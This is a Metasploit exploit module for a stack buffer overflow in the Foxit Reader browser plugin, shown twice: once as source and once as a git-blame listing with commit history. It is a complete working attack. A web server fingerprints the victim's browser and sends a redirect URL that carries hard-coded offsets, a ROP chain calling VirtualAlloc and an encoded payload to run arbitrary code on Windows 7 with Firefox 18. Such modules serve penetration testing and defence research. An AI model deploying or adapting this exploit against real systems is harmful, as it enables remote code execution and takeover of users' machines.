modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML

  Rank = NormalRanking

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Foxit Reader Plugin URL Processing Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability in the Foxit Reader Plugin, it exists in
          the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
          overly long query strings within URLs can cause a stack-based buffer overflow,
          which can be exploited to execute arbitrary code. This exploit has been tested
          on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
          (npFoxitReaderPlugin.dll version 2.2.1.530).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>',       # initial discovery and poc
          'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module
          'juan vazquez',                       # metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '89030' ],
          [ 'BID', '57174' ],
          [ 'EDB', '23944' ],
          [ 'URL', 'http://web.archive.org/web/20130113203143/http://secunia.com/advisories/51733/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # npFoxitReaderPlugin.dll version 2.2.1.530
          [ 'Automatic', {} ],
          [ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',
            {
              'Offset'          => 272,
              'Ret'             => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
              'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin
              :rop => :win7_rop_chain
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-01-07',
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    #Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] || ''

    case nt
      when '5.1'
        os_name = 'Windows XP SP3'
      when '6.0'
        os_name = 'Windows Vista'
      when '6.1'
        os_name = 'Windows 7'
    end

    if os_name == 'Windows 7' and firefox =~ /18/
      return targets[1]
    end

    return nil
  end

  def junk
    return rand_text_alpha(4).unpack("L")[0].to_i
  end

  def nops
    make_nops(4).unpack("N*")
  end

  # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)
  def win7_rop_chain

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]
        0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]
        0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]
        0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]
        0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]
        0x41414141, # Filler (RETN offset compensation)
        0x1000614c, # & push esp # ret  [npFoxitReaderPlugin.dll]
        0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]
        0x00001000, # 0x00001000-> edx
        0x1000d9ec, # XOR EDX, EDX # RETN
        0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]
        junk,
        0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]
        junk,
        junk,
        junk,
        0x41414141, # Filler (RETN offset compensation)
        0x00000040, # 0x00000040-> ecx
        0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]
        0x00000001, # 0x00000001-> ebx
        0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]
        0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]
        0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]
        nops,
        0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]
      ].flatten.pack("V*")

    return rop_gadgets
  end

  def on_request_uri(cli, request)

    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless self.respond_to?(my_target[:rop])
      print_error("Invalid target specified: no callback function defined")
      send_not_found(cli)
      return
    end

    return if ((p = regenerate_payload(cli)) == nil)

    # we use two responses:
    # one for an HTTP 301 redirect and sending the payload
    # and one for sending the HTTP 200 OK with appropriate Content-Type
    if request.resource =~ /\.pdf$/
      # sending Content-Type
      resp = create_response(200, "OK")
      resp.body = ""
      resp['Content-Type'] = 'application/pdf'
      resp['Content-Length'] = rand_text_numeric(3,"0")
      cli.send_response(resp)
      return
    else
      resp = create_response(301, "Moved Permanently")
      resp.body = ""

      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
      if datastore['SSL']
        schema = "https"
      else
        schema = "http"
      end

      sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
      sploit << [my_target.ret].pack("V") # EIP
      sploit << [my_target['WritableAddress']].pack("V") # Writable Address
      sploit << self.send(my_target[:rop])
      sploit << p.encoded

      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes')
      cli.send_response(resp)

      # handle the payload
      handler(cli)
    end
  end
end
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00
			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`Rank = NormalRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Foxit Reader Plugin URL Processing Buffer Overflow",`
			`'Description' => %q{`
			`This module exploits a vulnerability in the Foxit Reader Plugin, it exists in`
			`the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,`
			`overly long query strings within URLs can cause a stack-based buffer overflow,`
			`which can be exploited to execute arbitrary code. This exploit has been tested`
fix version info 2013-02-12 18:50:36 +01:00			`on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`(npFoxitReaderPlugin.dll version 2.2.1.530).`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'rgod <rgod[at]autistici.org>', # initial discovery and poc`
			`'Sven Krewitt <svnk[at]krewitt.org>', # metasploit module`
			`'juan vazquez', # metasploit module`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '89030' ],`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`[ 'BID', '57174' ],`
			`[ 'EDB', '23944' ],`
Update broken secunia references 2023-03-23 10:19:30 +00:00			`[ 'URL', 'http://web.archive.org/web/20130113203143/http://secunia.com/advisories/51733/' ]`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 2000,`
			`'DisableNops' => true`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => "process",`
Fix #8002 , Use post/windows/manage/priv_migrate instead of migrate -f 2017-02-23 17:04:36 -06:00			`'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`# npFoxitReaderPlugin.dll version 2.2.1.530`
			`[ 'Automatic', {} ],`
more fix version info 2013-02-12 18:51:04 +01:00			`[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.4.4.11281',`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`{`
			`'Offset' => 272,`
			`'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin`
			`'WritableAddress' => 0x10045c10, # from npFoxitReaderPlugin`
			`:rop => :win7_rop_chain`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2013-01-07',`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`'DefaultTarget' => 0))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`def get_target(agent)`
			`#If the user is already specified by the user, we'll just use that`
			`return target if target.name != 'Automatic'`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`#Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0`
			`nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] \|\| ''`
			`firefox = agent.scan(/Firefox\/(\d+\.\d+)/).flatten[0] \|\| ''`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`case nt`
			`when '5.1'`
			`os_name = 'Windows XP SP3'`
			`when '6.0'`
			`os_name = 'Windows Vista'`
			`when '6.1'`
			`os_name = 'Windows 7'`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`if os_name == 'Windows 7' and firefox =~ /18/`
			`return targets[1]`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`return nil`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Randomize some gadgets 2013-02-13 14:12:52 -06:00			`def junk`
			`return rand_text_alpha(4).unpack("L")[0].to_i`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Randomize some gadgets 2013-02-13 14:12:52 -06:00			`def nops`
			`make_nops(4).unpack("N*")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`# Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module)`
			`def win7_rop_chain`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`# rop chain generated with mona.py - www.corelan.be`
			`rop_gadgets =`
			`[`
Randomize some gadgets 2013-02-13 14:12:52 -06:00			`0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll]`
			`0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll]`
			`0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll]`
			`0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll]`
			`0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll]`
			`0x41414141, # Filler (RETN offset compensation)`
			`0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll]`
			`0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll]`
			`0x00001000, # 0x00001000-> edx`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`0x1000d9ec, # XOR EDX, EDX # RETN`
Randomize some gadgets 2013-02-13 14:12:52 -06:00			`0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll]`
			`junk,`
			`0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll]`
			`junk,`
			`junk,`
			`junk,`
			`0x41414141, # Filler (RETN offset compensation)`
			`0x00000040, # 0x00000040-> ecx`
			`0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll]`
			`0x00000001, # 0x00000001-> ebx`
			`0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll]`
			`0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll]`
			`0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll]`
			`nops,`
			`0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll]`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`].flatten.pack("V*")`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`return rop_gadgets`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`def on_request_uri(cli, request)`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`agent = request.headers['User-Agent']`
			`my_target = get_target(agent)`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`# Avoid the attack if no suitable target found`
			`if my_target.nil?`
			`print_error("Browser not supported, sending 404: #{agent}")`
			`send_not_found(cli)`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`unless self.respond_to?(my_target[:rop])`
			`print_error("Invalid target specified: no callback function defined")`
			`send_not_found(cli)`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`return if ((p = regenerate_payload(cli)) == nil)`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`# we use two responses:`
			`# one for an HTTP 301 redirect and sending the payload`
			`# and one for sending the HTTP 200 OK with appropriate Content-Type`
			`if request.resource =~ /\.pdf$/`
			`# sending Content-Type`
			`resp = create_response(200, "OK")`
			`resp.body = ""`
			`resp['Content-Type'] = 'application/pdf'`
			`resp['Content-Length'] = rand_text_numeric(3,"0")`
			`cli.send_response(resp)`
			`return`
			`else`
			`resp = create_response(301, "Moved Permanently")`
			`resp.body = ""`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']`
			`if datastore['SSL']`
			`schema = "https"`
			`else`
			`schema = "http"`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)`
			`sploit << [my_target.ret].pack("V") # EIP`
			`sploit << [my_target['WritableAddress']].pack("V") # Writable Address`
			`sploit << self.send(my_target[:rop])`
			`sploit << p.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
Rex::Text::uri_encode - make 'hex-all' really mean all. 2014-05-12 11:26:27 -05:00			`resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes')`
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`cli.send_response(resp)`
Retab modules 2013-08-30 16:28:54 -05:00
Make stable #1318 foxit reader exploit 2013-02-12 18:44:19 +01:00			`# handle the payload`
			`handler(cli)`
			`end`
			`end`
			`end`